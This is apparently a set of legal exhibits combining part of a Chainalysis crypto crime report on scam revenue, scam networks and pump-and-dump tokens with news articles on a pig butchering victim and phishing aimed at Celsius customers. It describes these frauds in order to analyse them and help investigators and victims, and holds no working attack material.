As we'll explore below, we attribute most of this decline to market conditions, as scam performance tends to worsen when cryptocurrency prices are in decline. However, some crypto scam types are growing despite the ongoing bear market. We must also add that our numbers are a lower-bound estimate. As with all forms of crypto crime, our estimates of the true amount lost to fraudsters will grow as we identify more addresses associated with scams. Underreporting exacerbates this problem, particularly in the case of so-called "pig butchering" scams, which we know to be a growing issue. In addition to scamming trends, we'll look at how some investigators on the cutting edge are using blockchain analysis to combat pig butchering scams, and also share data that points to the interconnected nature of the crypto scam ecosystem.

A0343

## 2022 crypto scam activity summarized

While scam revenue dropped overall, we still saw a number of highly successful scams, the top being Hyperverse, which pulled in nearly $1.3 billion in revenue.



All ten of 2022's top scams were investment scams, which as a category dominated overall scam revenue last year. However, that doesn't mean we can ignore other types of scams. Despite having lower overall revenue as a category, romance scams appear to have been the most destructive on a revenue-per-victim basis.

A0344



**A guide to the scam categories we track:**

• **Giveaway scams** are scams in which fraudsters solicit victims to send them cryptocurrency, promising to send them more in return. Giveaway scammers often impersonate celebrities to lend credence to the promise.

• **Impersonation scams** are scams in which fraudsters pretend to be someone in a position of authority or expertise — for instance, an IRS or Social Security representative — and tell victims they must send in cryptocurrency to correct some kind of problem or avoid getting in trouble.

• **Investment scams** are scams in which fraudsters promote a fake investment company promising outsized returns.

• **NFT scams** are scams in which fraudsters trick victims into buying fake NFTs designed to resemble more notable collections.

• **Romance scams** are scams in which the fraudster pretends to build a romantic relationship with the victim in order to convince or guilt them into sending them money. Romance scams can also include "pig butchering scams," which blend elements of romance scams and investment scams.

A0345

Romance scams took an average victim deposit of almost $16,000, nearly triple the next-closest category. It's also important to remember that underreporting by victims is likely more prevalent in romance scams due to their uniquely personal nature, so their total revenue and overall reach is probably higher than one would think based strictly on on-chain data.

## Crypto scams and market dynamics

Cryptocurrency scam revenue began the year trending upwards, but plummeted in early May — the same time the bear market set in following the collapse of TerraLuna — and then declined steadily throughout the rest of the year.



This fits with trends we've previously observed on how wider trends in crypto markets affect scamming. Generally speaking, scams take in less revenue from victims at times when crypto asset prices are declining. We can see this clearly on the graph below, which tracks scam revenue against the price of Bitcoin throughout 2022.



Scam revenue throughout the year tracks almost perfectly with Bitcoin's price, consistently maintaining a three-week lag between price moves and changes in revenue. However, not every distinct type of scam follows this pattern — some types of scams see revenue changes increase as crypto asset prices decrease.

A0347



For instance, unlike other kinds of scams, romance and giveaway scams don't show a positive correlation with Bitcoin's price (we use Bitcoin here because it's the biggest cryptocurrency by market cap and its price movements are generally correlated with those of other crypto assets). Investment scams, which also happen to get by far the most revenue of any other scam type, are one of the most correlated with Bitcoin's price. The reason for the difference likely lies in how the scams are pitched to victims. Investment scams typically promise users outsized investment returns, often based on an algorithmic, "can't lose" trading strategy. That pitch is probably more likely to succeed when the asset prices are growing, and the news is filled with stories of crypto investors striking it rich. Romance scams, on the other hand, are more about building a personal relationship with the victim, and the scammer convincing them that they care about the victim and need their help. That kind of emotional pitch is probably equally effective regardless of trends in the wider market, because the victim's primary goal isn't to get rich quick, but rather to help someone they believe to be a potential romantic partner. In fact, scammers may even pivot to romance scams versus investment scams in times of declining asset prices for those very reasons, which would intensify this trend further. Because of this, romance scams and other scam types whose performance doesn't track with Bitcoin price followed different revenue patterns throughout the year compared to investment scams.

A0348



Market conditions may have also influenced another trend we've seen develop over the past two years: the rise in usage of stablecoins by scammers.



**A0349**

Prior to 2022, most scams took payments primarily in Bitcoin. But this started to change in 2021, with scammers taking more and more of their revenue from victims in stablecoins, during a period of time when the price of crypto assets like Bitcoin was trending upward. Similarly, we see a spike in scammers' use of Bitcoin in mid-2022, when asset prices were trending down. This seems counterintuitive — wouldn't scammers prefer to accept victim payments in Bitcoin when Bitcoin is trending up? Scammers' solicitation of stablecoins over Bitcoin during bull markets may represent a hedge against a possible market crash. Scammers may also have better luck soliciting stablecoins in a bull market given that they have no price upside, while potential victims may be more inclined to hold their Bitcoin in the expectation it will go up in value.

## Who's falling victim to scams?

Different types of scams show different levels of effectiveness depending on the geographic area of the victim. Much of this is likely due to the location of the scammers themselves, as this will impact their ability to pitch victims based on their shared language and cultural context. But the geographic trends in scamming in many cases also match the geographic trends we've seen in the wider cryptocurrency ecosystem. We can see this on the chart below, which quantifies the amount different types of scams have taken from victims in different countries on a per capita basis.



Scam revenue by country per capita

A0350

Most scam types disproportionately receive revenue from the U.S., but this is especially true for NFT-related scams. We've written previously about the fact that NFTs are especially popular in North America, particularly when it comes to onboarding new cryptocurrency users — who are probably more likely to fall for scams given they're less experienced in the space — so this doesn't come as a huge surprise. Investment scams, which are the largest type of scam by revenue, draw on a wider array of countries, with Australia and parts of South America being the hardest hit.

## What services are these users relying on to send to scams?



The vast majority of victim payments to scams come from centralized exchanges. We also see scams receiving significant amounts from other illicit addresses, many of which are themselves other scams and could indicate that many distinct scams are actually controlled by the same individuals or groups, which is a topic we'll explore further below. DeFi protocols also send a significant amount to scams.

Our data also indicates that roughly 1.0% of victim payments to scams come from crypto ATMs. ATMs are an interesting category to dig into, as they aren't generally used to send funds to many other illicit address types — in fact, just 2.2% of funds sent from ATMs in 2022 went to illicit addresses, for a total of $67.5 million. However, a disproportionate share of that total goes to addresses associated with scams. Industry observers and law enforcement have noted this trend before, and blockchain analysis allows us to quantify it.



**Monthly value sent from crypto ATMs to illicit addresses by type of illicit activity, 2022**

In 2022, crypto ATMs were used to send at least $35.3 million to scammers, which represents more than half of all funds sent to illicit addresses using ATMs. While the dollar figures represent lower-bound estimates, the disproportionate share of funds leaving ATMs for scam addresses may be a result of crypto scammers' targeting of those who are new to cryptocurrency and not technologically adept. For that audience, an ATM similar to the ones they use for fiat may offer what appears to be the easiest way to initiate a cryptocurrency transaction, as users can simply insert cash, type in a cryptocurrency address, and complete their transfer. The data indicates that crypto ATM businesses could better serve their customers and significantly reduce their exposure to illicit activity by educating customers on scams, or even taking steps to warn customers before they transfer funds to an address known to be associated with a scam.

A0352

## Concentration in crypto scamming: Blockchain analysis indicates large scam networks may account for lots of fraudulent activity

We've often talked about how many forms of cryptocurrency-based crime appear to be driven primarily by small groups of prolific criminals despite what appear at first glance to be a large number of distinct on-chain entities participating in a given type of crime. For instance, in our ransomware section, we discuss how despite there being many ransomware strains active in any given year, a small group of ransomware affiliates are responsible for many of the attacks carried out by different strains, which we can see by analyzing those affiliates' wallets and observing that they receive cryptocurrency from many different strains.

Does the same thing hold true for crypto scams? We attempt to answer that question below by looking for evidence of on-chain interconnectedness between several different scam entities active in 2022. We'll also show how analysis of off-chain data — specifically, the copy on the public-facing websites associated with many crypto investment scams — can enable investigators to find more scams once they've identified one.

Our analysis starts with five crypto scams the CFTC identified and filed charges against in September 2022:

- Cryptostockoptionstrade Ltd
- Global Smart Option Broker Ltd
- Hypertradingoption Ltd
- Stockbrokertechniques Ltd.
- SprintTrade

The CFTC's press release doesn't explicitly state whether all five scams are believed to be controlled by the same individual or group, but it does note that they purport to be located at the same Los Angeles street address. That alone doesn't necessarily mean all of these scams are associated with the same individual or group — the idea of a scammer simply copying text from the website of another scam, such as the listed street address, doesn't seem to be out of the question. With that in mind, we decided to search the web for other websites of purported crypto investment companies whose websites contained identical copy to those of the scams in the CFTC press release — not just street addresses, but other pieces of web copy such as customer testimonials — and cross-reference them with our own data to see if textual analysis of scam websites could turn up other scams that may or may not be connected to the original five named by CFTC. Ultimately, we were able to find functioning websites and cryptocurrency addresses for three of the five scams named by CFTC, so those three were what we used as reference points to find more scams.

**In total, this analysis uncovered another 200 confirmed scams whose websites contain pieces of copy identical to that of the three CFTC-identified scams for which we found active websites.** In other words, website analysis led to a 66x increase in the number of scams uncovered. The grid below breaks down the newly identified scams by the specific website elements they had in common with the five scams in the CFTC press release.

| Number of new scams identified | How we found them |
|---|---|
| 88 | Same street address as CFTC-identified scam |
| 102 | Identical customer testimonial as CFTC-identified scam |

Right off the bat, we can see how scanning for websites with copy identical to that of known scam websites can be valuable, as we quickly unearthed an additional 200 scams. But again, that on its own doesn't prove that all 200 are run by the same individual or group, as it's entirely possible scammers are just stealing web copy from each other due to laziness, or even in an effort to throw investigators off and give the impression that their scam is the work of someone else. However, we can use blockchain analysis to find another commonality between scams in this set of 200 that could be a stronger indicator of interconnectedness or common control: Deposit address overlap.

As we discuss in our money laundering analysis, criminals dealing in cryptocurrency generally want to move their ill-gotten funds to a fiat off-ramp service where the crypto can be converted into cash — usually, this means a centralized exchange. If we see two scams moving their cryptocurrency to the same deposit address at an exchange, it means one of two things: Either one scammer controls the deposit address, meaning they are behind both scams, or the deposit address belongs to a nested service that's being used to launder funds — in that case, a single scammer may still be behind both scams and simply prefers to funnel funds from both to the same nested service, but it could also mean that two separate scammers simply happen to use the same service. So, while deposit address overlap isn't proof positive that two scams are controlled by the same individual or group, it certainly adds to the likelihood that they are.

Given that, our next step was to analyze the exchange deposit addresses to which all 203 scams had ever sent funds, and sort the scams into distinct, mutually exclusive **scam networks** based on deposit address overlap. For the purposes of this analysis, we consider two scams to be part of the same network if they sent any amount of cryptocurrency to the same deposit address. Two scams can also be part of the same scam network without depositing to the same deposit address if they are both connected to a third scam via another deposit address. In other words, if Scam A sends funds to Deposit Address 1 and Deposit Address 2, Scam B sends funds to Deposit Address 2 and Deposit Address 3, and Scam C sends funds to Deposit Address 3 and Deposit Address 4, then we would consider all three scams to be part of the same scam network. Scams that never deposited anything to an exchange were excluded from the analysis.

After applying this methodology to the 203 scams in our dataset — the original three identified by CFTC plus the 200 additional scams with website commonalities — we found that 73 of them had never deposited to an exchange. The remaining 130 fit into 43 distinct scam networks based on deposit address overlap, but ultimately, one network stood out above the rest.

| Scam network | Number of distinct scams in network | Total revenue of all scams in network | Number of exchanges used by scams in network to cash out | Number of exchange deposit addresses used by network |
|---|---|---|---|---|
| 1 | 86 | $3,400,080 | 69 | 1667 |
| 2 | 1 | $45,177 | 2 | 6 |
| 3 | 1 | $42,868 | 3 | 7 |
| 4 | 1 | $20,223 | 3 | 10 |
| 5 | 2 | $17,133 | 3 | 5 |
| 6 | 1 | $16,940 | 3 | 3 |
| 7 | 1 | $16,882 | 1 | 3 |
| 8 | 1 | $16,294 | 2 | 5 |
| 9 | 2 | $15,384 | 3 | 6 |
| 10 | 1 | $13,193 | 7 | 11 |
| 11 | 1 | $11,401 | 1 | 1 |
| 12 | 1 | $9,968 | 1 | 1 |
| 13 | 1 | $8,489 | 7 | 16 |
| 14 | 1 | $7,532 | 1 | 1 |
| 15 | 1 | $6,817 | 5 | 8 |
| 16 | 1 | $6,633 | 6 | 10 |
| 17 | 1 | $6,375 | 2 | 3 |
| 18 | 1 | $6,039 | 1 | 2 |
| 19 | 1 | $5,848 | 2 | 4 |
| 20 | 1 | $5,296 | 2 | 3 |
| 21 | 1 | $3,650 | 1 | 1 |

| Scam network | Number of distinct scams in network | Total revenue of all scams in network | Number of exchanges used by scams in network to cash out | Number of exchange deposit addresses used by network |
|---|---|---|---|---|
| 22 | 1 | $3,339 | 1 | 2 |
| 23 | 1 | $3,210 | 5 | 43 |
| 24 | 1 | $2,876 | 9 | 66 |
| 25 | 1 | $2,823 | 1 | 3 |
| 26 | 1 | $2,417 | 2 | 6 |
| 27 | 1 | $2,105 | 1 | 1 |
| 28 | 1 | $2,061 | 2 | 2 |
| 29 | 1 | $2,015 | 1 | 2 |
| 30 | 1 | $1,885 | 1 | 4 |
| 31 | 1 | $1,773 | 1 | 1 |
| 32 | 1 | $1,387 | 1 | 3 |
| 33 | 1 | $1,080 | 1 | 2 |
| 34 | 1 | $971 | 4 | 11 |
| 35 | 1 | $831 | 1 | 3 |
| 36 | 1 | $755 | 1 | 1 |
| 37 | 1 | $295 | 1 | 2 |
| 38 | 1 | $170 | 1 | 1 |
| 39 | 1 | $150 | 2 | 2 |
| 40 | 1 | $137 | 1 | 1 |
| 41 | 1 | $123 | 1 | 1 |
| 42 | 1 | $117 | 1 | 1 |
| 43 | 1 | $110 | 1 | 2 |

**A0356**

Network 1 contains 86 active scams that have made a combined $3.4 million from victims, and utilize 1,667 total exchange deposit addresses. Interestingly, all of the scams identified in the CFTC press release that kicked off this analysis are part of Network 1 as well. Two of the remaining 42 networks are composed of two scams, while the rest only have one scam apiece. Overall, the 86 scams in Network 1 account for 91.6% of the total revenue of all 130 scams included.

We can't know from on-chain data alone whether the 86 scams in that network are each run by the same individual or group. The only way to know for sure would be for law enforcement to carry out an investigation, which would likely include sending subpoenas to the exchanges to which the scammers are depositing funds to see whose user accounts they're associated with. However, even if the scams in each network just coincidentally depend on the same nested services or money launderers to convert their crypto into cash, that would still be positive news for investigators, as it would mean that they could disrupt several scams at once by going after a small number of money laundering service providers.

Overall, our data suggests that the cryptocurrency scamming ecosystem is smaller than it appears at first glance. We look forward to applying our scam network methodology to a wider number of scams beyond the 203 included in this analysis, and will share insights from that expanded analysis where possible.

## How investigators are fighting back against pig butchering scams

### What are pig butchering scams?

One particularly sophisticated type of crypto scam, pig butchering, gained media attention in 2022. Analogized to fattening a pig before slaughter, pig butchering is a slow-burn scam focused on building trusting relationships. Most of these operations function in similar fashion. Scammers find targets with whom they develop relationships over time. They create fake social media accounts and dating site profiles showcasing lavish lifestyles and send random messages to connect with victims. Frequently used apps include WeChat, WhatsApp, and even LinkedIn.

While the scammers are relationship-building, they're also performing reconnaissance to see which victims have the most investment potential. Once targets are identified and trust is built, the scammer subtly mentions a crypto investment website with which they've had personal success.

Alastair McCready, Southeast Asia Editor at Vice World News says, "You're not getting an email saying 'there's a million dollars that needs releasing in a bank account in Switzerland.' This is just kind of subtle little messages, like on WhatsApp. And if you were the kind of person who was kind of looking for some sort of connection, you could see how you'd be easily lured in, sucked in by a seemingly innocuous conversation with a nice person."

Over weeks or months, scammers coach victims on how to use these fake sites, convincing them to invest everything they possibly can. These platforms falsify returns and make it appear as though victims have access to the funds. Initially, they can make withdrawals. Once scammers believe they've exhausted their victims' potential, they try convincing them to take out loans. When victims become wary, the scammer restricts access to funds and attempts to extort them for even more money.

Sadly, those on the receiving end of pig butchering are not the only victims. Most of these crimes originate in Southeast Asia and require human trafficking to run. Around 2016, a large construction project began in Sihanoukville, a coastal town in Cambodia. Chinese investors built hundreds of casinos to attract tourists from mainland China, where gambling is illegal. In 2019, Cambodia banned online gambling and then COVID-19 hit, devastating Sihanoukville's tourist economy. Many businesses turned to criminal activity to generate revenue; some recruited workers for customer service jobs under false pretenses. On arrival, new employees were ushered into hotel casino complexes — now walled, guarded compounds — and weren't allowed to leave. Casino-based scam centers like these are also found in Laos and Myanmar.

As for pig butchering scam victim profiles, those run the gamut from elderly to millennial and across genders, too. Asian Americans are often targeted because it's easier for scammers to communicate with them using a common language. Pig butchering also preys on people's kindness and vulnerability; one woman was targeted after she responded to a Facebook ad about adopting a dog.

## How the REACT Task Force and Santa Clara County are helping victims

Agents from California's Regional Enforcement Allied Computer Team (REACT) investigated several pig butchering scams last year; to date it has investigated over 50 cases. Comprised of local, state, and federal agencies covering five counties in the Bay Area, the REACT task force, including Santa Clara County's Deputy District Attorney, Erin West, is demonstrating how law enforcement can successfully conduct crypto crime investigations and recover funds for victims.

Rather than shutting down easily-replaceable websites or trying to arrest overseas scammers in problematic jurisdictions, REACT's main goals are to quickly assess stolen funds by tracing the victim's initial transfer out of an exchange or wallet to a suspect, and attempt to effect a seizure. When tracing funds during investigations, the agency doesn't dwell on pass-through wallets; it targets those containing funds that it can directly attribute to victims as California law states that law enforcement can only seize funds that meet that criteria.

Since many citizens and even law enforcement agencies believe that crypto transactions aren't traceable, these investigations are full of unique challenges. REACT detective Chris Vigil says that when crypto scams affecting private individuals occur, investigators don't typically get involved until weeks or months later — victims often don't realize they have any recourse or don't know where to go for help. Meanwhile, most local law enforcement doesn't have the resources to investigate these

crimes. However, in cases where victims do reach out to more than one agency, deconflicting information poses a substantial challenge.

To successfully investigate crypto scams requires tools that help law enforcement trace funds in order to effect seizure. The graph below illustrates how REACT tracks cryptocurrency transactions for a typical pig butchering scam, and demonstrates how bad actors transfer funds through intermediary wallets in order to move them to an exchange. In this case, the victim transferred cryptocurrency to wallets associated with four different versions of the same scam over a period of months. By following transfers across intermediary wallets, the investigation tied different pig butchering sites together, too.



Between July 10 and August 3, 2022, the victim sent three ETH transactions to the fraudulent investment site ASXWalletExt.com, totaling almost $21,500. From there, the suspect converted the ETH to USDT and transferred funds to various intermediary wallets with exposure to three other investment scam sites. They later cashed out funds at an exchange. Next, the scammer extorted the victim further, saying they would "unlock" her frozen account on ASXWalletExt.com, compelling her to send roughly $19,500 USDT from her exchange account, as we see on the second graph below. By tracing subsequent transactions across intermediate addresses, REACT observed the suspect cashing out at a large exchange.

**A0359**



Once REACT agents are able to obtain judicial authorization for a seizure, the cryptocurrency is then transferred to a government-controlled account. When the funds are secured, the case is referred to West who works with the courts to release the funds to the rightful owner. To date, REACT and Santa Clara County have recovered funds in 15 of the pig butchering cases they have investigated. While the organization can only work cases with a victim or suspect in its jurisdiction, it often advises adjacent agencies and others across the country, too. REACT sees education and resources as the biggest roadblocks for law enforcement in investigating crypto crimes, but believes there are ways for more agencies to get involved. Having the statutory authority to effect seizures and obtaining buy-in from leadership — along with backing from prosecutors — are key to getting started. Then having the right policies in place to conduct investigations and using robust blockchain analysis tools to trace funds are essential for success.

# Pump and Dump Tokens

# 24% of New Tokens Launched in 2022 Bear On-Chain Characteristics of Pump and Dump Schemes

Pump and dump schemes in traditional finance are quite simple: Holders of a tradable asset, such as stock in a company, will heavily promote the asset to other investors, often using misleading statements, causing the price to rise rapidly as new investors buy. The holders will then sell their overvalued shares at a profit, causing the price to plummet, leaving the newer investors stuck with a low-value asset.

Unfortunately, pump and dump schemes have also become common in the crypto world. This is largely due to the relative ease with which bad actors can launch a new token and establish an artificially high price and market capitalization for it "on paper" by seeding the initial trade volume and controlling the circulating supply. Additionally, teams launching new projects and tokens can remain anonymous, which makes it possible for serial offenders to carry out multiple pump and dump schemes.

We can see an example of what a typical pump and dump scheme looks like on-chain below in Chainalysis Storyline, using an undisclosed token example. The token bears all the telltale signs of a pump and dump scheme, with the asset's price dropping 90% in the first week of trading following the token creator dumping their holdings.



The token provides a good model for how pump and dump tokens work. The creator launched this token's smart contract and funded a new liquidity pool for it on a popular DEX in December 2021, after promoting the launch to crypto enthusiasts on social media. Hundreds of victims bought the token on that DEX, allowing the price to rise quickly in a matter of hours. However, within the same day of launch, the creator sold off all of his tokens, leaving buyers holding the bag. Overall, the perpetrator made just under $20,000.

Below, we attempt to quantify the scale of pump and dump schemes in cryptocurrency by analyzing all tokens launched on the Ethereum and BNB blockchains in 2022. While more than 1.1 million tokens were launched last year, **the vast majority got virtually no traction**, as measured by the frequency of swapping happening on DEXes. Since we want to focus on projects that had an impact on the crypto ecosystem, we'll only count tokens that achieved a minimum of ten swaps and four consecutive days of trading in the week following their launch. With that criteria in place, the number of new tokens falls from 1.1 million to 40,521.

The next criteria we'll look for is a drastic price decline of 90% or more in the first week of trading, which could suggest the token's originators and earliest holders dumped the token extremely quickly, making it a relatively strict standard for assessing a token as a possible pump and dump. **Of the 40,521 tokens launched in 2022 that gained sufficient traction to be worth analyzing, 9,902, or 24%, saw a price decline in the first week indicative of possible pump and dump activity.**

| | Number of tokens | Percent of all tokens launched |
|---|---|---|
| Total tokens launched | 1,105,239 | 100.0% |
| Tokens with over 10 swaps and 4 consecutive trading days in first week after launch | 40,521 | 3.7% |
| Tokens with a 90% price drop in first week after launch | 9,902 | 0.9% (24% of tokens that got traction) |

It's possible, of course, that in some cases, teams involved with token launches did their best to form a healthy offering, and the subsequent drop in price was simply due to market forces and challenges stemming from less established infrastructure for market creation in the digital asset space. While it's impossible to know the promotional strategy or intentions behind all 9,902 tokens, we did check the 25 with the biggest first-week price drop on Token Sniffer, a service that scores new tokens on a scale of zero to 100 based on their trustworthiness and docks points for any scam-like character-istics. According to Token Sniffer, those 25 tokens all scored zero, indicating that, according to Token Sniffer's evaluation criteria, they were almost certainly designed for a pump and dump. Token Sniffer also found that many of them contained malicious "honeypot" code that prevents new buyers from selling the token — one of the surest possible signs that the coin is part of a pump and dump scheme.

In total, buyers not believed to be associated with the tokens' creators spent a total of $4.6 billion worth of cryptocurrency acquiring some of the 9,902 suspected pump and dump tokens we identified — a relatively trivial amount compared to the trillions in crypto transaction volume in 2022, but still a substantial amount of damage for unsuspecting investors. We estimate that the creators of these tokens made a total of $30 million in profits from selling off their holdings before the tokens' value plummeted. In many cases, the same wallet provided initial liquidity for several tokens that fit our pump and dump criteria, or provided funding to the wallet that did, suggesting those wallets share common ownership. Using this methodology, we found that 445 individuals or groups accounted for 24% of the 9,902 suspected pump and dump tokens launched in 2022.



The most prolific suspected pump and dump token creator we identified launched 264 tokens that fit our criteria in 2022.

Pump and dump schemes are uniquely destructive in the cryptocurrency world due to the ease with which new tokens can be launched and the social media-driven nature of crypto investment news and discussion. Many believe that cryptocurrency is approaching an inflection point that could spark mass adoption, but that could be difficult if the general public perceives cryptocurrency as rife with pump and dump schemes designed to prey on newcomers. We look forward to working with our partners in both the public and private sectors to investigate this activity and build a safer ecosystem in the future.



# Thanks for reading the 2023 Crypto Crime Report

## Chainalysis Authors

**Kim Grauer**
Director of Research

**Eric Jardine**
Cybercrimes Research Lead

**Erin Leosz**
Content Marketing Manager

**Henry Updegrave**
Senior Content Marketing Manager

This material is for informational purposes only, and is not intended to provide legal, tax, financial, or investment advice. Recipients should consult their own advisors before making investment decisions.

This report contains links to third-party sites that are not under the control of Chainalysis, Inc. or its affiliates (collectively "Chainalysis"). Access to such information does not imply association with, endorsement of, approval of, or recommendation by Chainalysis of the site or its operators, and Chainalysis is not responsible for the products, services, or other content hosted therein.

Chainalysis does not guarantee or warrant the accuracy, completeness, timeliness, suitability or validity of the information in this report and will not be responsible for any claim attributable to errors, omissions, or other inaccuracies of any part of such material.



# Building trust
# in blockchains

### About Chainalysis

Chainalysis is the blockchain data platform. We provide data, software, services, and research to government agencies, exchanges, financial institutions, and insurance and cybersecurity companies in over 70 countries. Our data powers investigation, compliance, and market intelligence software that has been used to solve some of the world's most high-profile criminal cases and grow consumer access to cryptocurrency safely. Backed by Accel, Addition, Benchmark, Coatue, GIC, Paradigm, Ribbit, and other leading firms in venture capital, Chainalysis builds trust in blockchains to promote more financial freedom with less risk. For more information, visit www.chainalysis.com.

| FOR MORE INSIGHTS | GET IN TOUCH |
| --- | --- |
| blog.chainalysis.com | info@chainalysis.com |

| FOLLOW US ON TWITTER | FOLLOW US ON LINKEDIN |
| --- | --- |
| @chainalysis | linkedin.com/company/chainalysis |

**Exhibit F**

This copy is for your personal, non-commercial use only. Distribution and use of this material are governed by our Subscriber Agreement and by copyright law. For non-personal use or to order multiple copies, please contact Dow Jones Reprints at 1-800-843-0008 or visit www.djreprints.com.

https://www.wsj.com/articles/a-text-scam-called-pig-butchering-cost-her-more-than-1-6-million-11666258201

U.S.

# A Text Scam Called 'Pig Butchering' Cost Her More Than $1.6 Million

Scammers swindle professionals with friendship to generate fake cryptocurrency investments

*By Robert McMillan* | Follow

Oct. 20, 2022 5:30 am ET

The text message on Jane Yan's mobile phone came from a number she didn't recognize. "Are we going to the salon tonight?" It looked like the kind of mistake that can happen any day.

In fact, it was part of a continuing scam that cost U.S. victims more than $429 million in losses last year, according to the Internet Crime Complaint Center, the Federal Bureau of Investigation's clearinghouse for consumer complaints about online crime.

Three months after beginning a conversation with the person who texted her, Ms. Yan had lost more than $1.6 million, the victim of a wave of messages that have flooded onto mobile devices this year via text message and social media, according to law-enforcement officials.

In Santa Clara County, Calif., complaints about these scams have skyrocketed over the past two years as people have become more accustomed to meeting and doing business virtually, said Jeff Rosen, the county's district attorney.

The scam preys on basic decency—the impulse to help someone who sends a message by mistake—and loneliness, Mr. Rosen said. "There are a lot of lonely people out there, and while the vast, vast majority of people are not going to respond to that kind of text, a few will," he said.

The average losses reported from these scams are $300,000, Mr. Rosen said.

The scammers are often based in Asia, where the con is known as "pig butchering"—a reference to the practice of first "fattening" the victim's cryptocurrency account with fake gains before the scam ends, according to advocacy groups and law-enforcement officials.

The Global Anti-Scam Organization, a nonprofit that works to help victims and **raise public awareness on scams**, has counted more than 2,000 victims so far, and they tend to be successful professionals, said Brian Bruce, chief of operations with the group. "They've got Ph.D.s; they're successful business owners; they're senior managers," he said. "One scammer said to me, 'We don't talk to Uber drivers or farmers.'"

Jane Yan's text about the salon came on Jan. 20. Normally she would have ignored it, she said, but she didn't. "You must have the wrong person," she responded.

The person sending the text said he was "Eric," a Chinese businessman who was stuck in Seattle because of Covid. He was very polite and apologized for the wrong number. Then he started asking her questions. "Are you working here? Are you going to school here?" he asked. They began to chat, eventually by voice, but not about serious or financial topics. Eric liked to discuss family, food and popular culture, Ms. Yan remembered. He offered advice on life.

Eric claimed to be a widower with an 8-year-old daughter. He was trying to bring her up and plan for her future. Ms. Yan, the mother of two college-age students, said she could relate.

Married to an American and living in Delaware for more than 30 years, Ms. Yan, a 51-year-old business analyst, welcomed the opportunity to speak her native Chinese. She and Eric quickly became friendly. He would send her photos of the food he was cooking. He was charming, she said, and would teach her the latest pop songs by calling her and singing over the phone.

Within a month, they were talking about money. Eric said he had more than $10 million, mostly made from cryptocurrency investments, she said. Had Jane invested in crypto? he asked. She said no, she wasn't interested. By then, she thought of him as a trustworthy friend. On Feb. 15, she opened her first account with the cryptocurrency exchange Coinbase.

As cryptocurrency has become more mainstream and convenient to use, it is easier for scammers to persuade their victims to set up **digital currency accounts** through which money can be moved internationally in seconds, said Zacharia Baldwin, a supervisory special agent with the FBI in Miami. "The popularity and adaptation of digital currency has made this explode," he said.

Eric was likely working out of a compound in Asia. Often these scams operate as businesses in certain regions, said Mr. Bruce, of the Global Anti-Scam Organization. He said his group has interviewed employees of these outfits who say the operators sometimes hire psychologists to write scripts for the scammers to read.

In many locations, the workers operate under inhumane conditions and are sometimes subject to physical abuse, Mr. Bruce said. "If you don't perform, you get abused in some form or fashion," he said. "And performing means cheating and deceiving others."

Mr. Bruce himself was the victim of one of these scams in 2021. He lost more than $191,000 to someone who connected with him out of the blue on LinkedIn and claimed to have previously worked at the same company as Mr. Bruce, he said.

In February, Ms. Yan said she transferred $5,000 into an investment platform called BQBEX.top. As of this week, the website was no longer online. It described itself as "the world's leading digital asset trading platform," according to a July 29 screenshot of the site taken by the web-analysis platform Urlscan GmbH. The website's operators couldn't be reached for comment.

After three minutes of trading Ms. Yan believed she had made $1,000. A month later, in March, she invested $400,000, and Eric had lent her another $100,000 to make her total account balance more than $500,000. Quickly, she made a 20% return on that. The exchange seemed too good to be true.

It was too good to be true. By April 30, she had invested her retirement fund in BQBEX, borrowed money from family members, invested her children's college money and her husband's retirement fund, she said. Because she felt she owed Eric money, she felt pressure to get money out of the account. Every time she tried, there was one more fee to pay, a little more to pay to the scammers.

Ms. Yan needed to invest more to initiate a money transfer. She had to pay money to get a lock taken off her account. And then she had to pay taxes.

By April 29, she still didn't have her money. The exchange told her she needed to pay another $260,000 to unlock her Coinbase wallet.

By then, her total losses were $1.66 million, she said.

"That night, I felt very, very uneasy," she said. " I thought there was something wrong."

The next day, she reported her case to the police. She gave Eric's name and number to a private investigator in Washington state. The investigator told her that Eric didn't exist.

Ms. Yan reported her case to law enforcement, including staff at Mr. Rosen's office in Santa Clara County, which has developed expertise in helping victims of these scams. She said she

**A0370**

has been at times overwhelmed by feelings of guilt and self-blame.

"I haven't really smiled since I found out that this happened," she said. "I feel really helpless and hopeless."

The best response to one of these text messages is to ignore it, Mr. Rosen said. "If someone asks you to deposit money somewhere, don't do that," he said. "Call your local police department.

**Write to** Robert McMillan at Robert.Mcmillan@wsj.com

---

## Crypto Spotlight

The latest on cryptocurrencies following a spate of challenges, selected by editors

> **SIGN UP FOR THE WSJ CRYPTO NEWSLETTER**

**Crypto Crisis: A Timeline of Key Events**

**Crypto Giant Binance Courted High-Frequency Traders**

**Bitcoin Booms in Wake of Bank Crisis**

**U.S., South Korea Vie for Extradition of Do Kwon**

**Hong Kong's Crypto Ambitions Get a Boost**

**The Couple Behind El Salvador's Bitcoin Experiment**

**Banks Step Up to Serve Crypto Firms**

**SEC Prepares Action Against Coinbase**

---

*Appeared in the October 21, 2022, print edition as 'Crypto Scam Costs Victims Hundreds Of Millions in Losses'.*

**Exhibit H**

Bloomberg Law·

Bankruptcy Law
Dec. 1, 2022, 1:11 PM

# Scammers, Posing as Kirkland Lawyers, Phishing Celsius Customers

By James Nani

- Phishing attempts highlight fight between privacy, transparency

- Scam seeks to access personal digital wallets, Kirkland says

Scammers pretending to be Kirkland & Ellis LLP restructuring associates are sending phishing emails to customers of bankrupt crypto lender Celsius Network LLC in an effort to access crypto wallets, a Kirkland attorney told a bankruptcy court.

Phishing attempts targeting Celsius customers are also occurring via telephone, Joshua Sussberg, a partner at Kirkland and Celsius' lead bankruptcy attorney, told the US Bankruptcy Court for the Southern District of New York in court papers Wednesday.

The phishing emails highlight a growing schism in cryptocurrency bankruptcies between privacy and court transparency.

The scam emails portray the Celsius logo and tell customers to click on a link to a spreadsheet to view their claim, according to court papers. The customer is asked to provide an address to their personal digital wallet, recommends performing a "test transaction," and says the company will "issue an initial refund installment equal to 25% of the value of customer assets."

The email names a Kirkland associate, and also says it comes from the Celsius legal team.

Judge Martin Glenn in September ruled that individual Celsius customers' home and email addresses could be redacted, but their names could not. Information about business entities that are creditors were also required to be revealed. Creditors must also reveal their names to provide proofs of claim, Glenn ruled.

The case is Celsius Network LLC, Bankr. S.D.N.Y., No. 22-10964, notice 11/30/22.

To contact the reporter on this story: James Nani in New York at jnani@bloombergindustry.com

To contact the editor responsible for this story: Maria Chutchian at
mchutchian@bloombergindustry.com

## Documents

📄  Notice

📄  Docket

| Related Stories | ANALYSIS: In FTX Case, Transparency And Privacy Play Tug-Of-War |
|---|---|
| | Nov. 25, 2022, 5:00 AM |

